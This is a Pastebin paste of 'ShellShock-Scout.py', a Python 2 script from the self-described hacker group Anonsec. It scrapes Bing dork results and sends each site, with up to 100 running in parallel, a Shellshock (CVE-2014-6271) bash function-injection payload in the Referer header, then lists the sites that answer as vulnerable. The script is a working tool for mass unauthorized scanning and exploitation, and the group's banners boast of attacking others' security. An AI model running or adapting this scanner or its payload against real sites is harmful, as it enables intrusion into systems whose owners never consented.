SHARE
TWEET

[+] ShellShock-Scout.py [+]

_d3f4ult Oct 6th, 2014 (edited) 2,172 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. # We are...
  3. #                     _____                         _________              
  4. #                    /  _  \   ____   ____   ____  /   _____/ ____   ____  
  5. #                   /  /_\  \ /    \ /  _ \ /    \ \_____  \_/ __ \_/ ___\
  6. #                  /    |    \   |  (  <_> )   |  \/        \  ___/\  \___
  7. #                  \____|__  /___|  /\____/|___|  /_______  /\___  >\___  >
  8. #                          \/     \/            \/        \/     \/     \/
  9. #                                   //Laughing at your security since 2012*
  10. # ================================================================================================
  11. # Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - 4prili666h05t - Hannaichi - ap3x h4x0r
  12. #                         - Gh05tFr3ak - xCyb3r 3vil7 -  Hassouna Khalil - spider64
  13. # ================================================================================================
  14. #
  15. #
  16. # We are Anonsec
  17. # Beware of our Cyber-Mafia
  18. # We do not Forgive
  19. # We do not Forget
  20. # Expect Us
  21. #
  22. print "###########################################################"
  23. print "###                ShellShock_Scout.py                  ###"      
  24. print "###          Mass Bing ShellShock Dork Scanner          ###"
  25. print "###                   CVE-2014-6271                     ###"
  26. print "### *************************************************** ###"
  27. print "###                   \!/Anonsec\!/                     ###"
  28. print "###        Laughing at your security since 2012*        ###"                      
  29. print "###                                                     ###"
  30. print "###                    _.-''|''-._                      ###"
  31. print "###                 .-'     |     `-.                   ###"
  32. print "###               .'\      |       /`.                 ###"
  33. print "###             .'   \     |      /   `.               ###"
  34. print "###             \    \    |     /     /               ###"
  35. print "###              `\   \   |    /    /'                ###"
  36. print "###                `\  \  |   /   /'                  ###"
  37. print "###                  `\ \ |  /  /'                    ###"
  38. print "###                 _.-`\ \ | / /'-._                   ###"
  39. print "###    ~~(8:>      {_____`\\|//'______}  ~~(8:>          ###"
  40. print "###                        `-'                          ###"
  41. print "### twitter.com/_d3f4ult                                ###"
  42. print "###########################################################"
  43. from gevent import monkey
  44. monkey.patch_all()
  45. from gevent.pool import Pool
  46. from gevent import joinall
  47. import urllib
  48. import urllib2
  49. import argparse
  50. import sys
  51. import json
  52. import socket
  53. socket.setdefaulttimeout(60)
  54. VULN_FOUND = None
  55. def parse_args():
  56. #Create the arguments
  57.         parser = argparse.ArgumentParser()
  58.         parser.add_argument("-s", "--search", help="Search terms")
  59.         parser.add_argument("-p", "--pages", default="1", help="Number of pages of results to fetch where there's 50 results per page; defaults to 1")
  60.         parser.add_argument("-k", "--key", help="Your Bing API key found at https://datamarket.azure.com/account")
  61.         return parser.parse_args()
  62. def bing_search(query, key, offset, **kwargs):
  63. #Make the search
  64.         username = ''
  65.         baseURL = 'https://api.datamarket.azure.com/Bing/Search/'
  66.         query = urllib.quote(query)
  67.         user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)'
  68.         credentials = (':%s' % key).encode('base64')[:-1]
  69.         auth = 'Basic %s' % credentials
  70.         url = baseURL+'Web?Query=%27'+query+'%27&$top=50&$format=json&$skip='+offset
  71.         print '[*] Scanning -> '+url
  72.         password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
  73.         password_mgr.add_password(None, url, username, key)
  74.         handler = urllib2.HTTPBasicAuthHandler(password_mgr)
  75.         opener = urllib2.build_opener(handler)
  76.         urllib2.install_opener(opener)
  77.         try:
  78.                 readURL = urllib2.urlopen(url, timeout=60).read()
  79.         except Exception as e:
  80.                 sys.exit('[-] Failed to fetch bing results. Are you sure you have the right API key?\n Error: '+str(e))
  81.         return readURL
  82. def action(result):
  83. #Make the payloaded request and check the response's headers for the echo msg
  84.         global VULN_FOUND
  85.         exploit = "() { :;}; echo 'Shellshock: Vulnerable'"
  86.         ua = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'
  87.         url = result['Url']
  88.         req = urllib2.Request(url)
  89.         req.add_header('User-Agent', ua)
  90.         req.add_header('Referer', exploit)
  91.         try:
  92.                 r = urllib2.urlopen(req, timeout=60)
  93.         except Exception as e:
  94.                 return
  95.         resp_headers = r.info()
  96.         if 'shellshock' in r.info():
  97.                 VULN_FOUND = True
  98.                 print '[!] SHELLSHOCK VULNERABLE:', url
  99.         return
  100. def result_concurrency(results):
  101. #Open all the greenlet threads
  102.         in_parallel = 100
  103.         pool = Pool(in_parallel)
  104.         jobs = [pool.spawn(action, result) for result in results]
  105.         return joinall(jobs)
  106. def main():
  107.         args = parse_args()
  108.         if not args.search:
  109.                 sys.exit('[!] Specify a search term, eg, ./shellshock_scout.py -s "dorks"')
  110.         if not args.key:
  111.                 sys.exit('[!] Specify a Bing API key or get one here: https://datamarket.azure.com/dataset/bing/search')
  112.         key = args.key
  113.         if len(key) not in (44, 43):
  114.                 sys.exit('[-] Incorrect key length')
  115.         query = args.search
  116.         pages = int(args.pages)
  117.         offset = 0
  118.         total_results = []
  119.         for x in xrange(pages):
  120.                 # Start off with offset = 0
  121.                 if x != 0:
  122.                         offset += 50
  123.                 response = bing_search(query, key, str(offset))
  124.                 results = json.loads(response)['d']['results']
  125.                 if len(results) == 0:
  126.                         print '[-] No more results found'
  127.                         break
  128.                 total_results += results
  129.         print '[*] Checking each search result...'
  130.         result_concurrency(total_results)
  131.         if not VULN_FOUND:
  132.                 print '[-] No vulnerable sites found'
  133. if __name__ == "__main__":
  134.         main()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top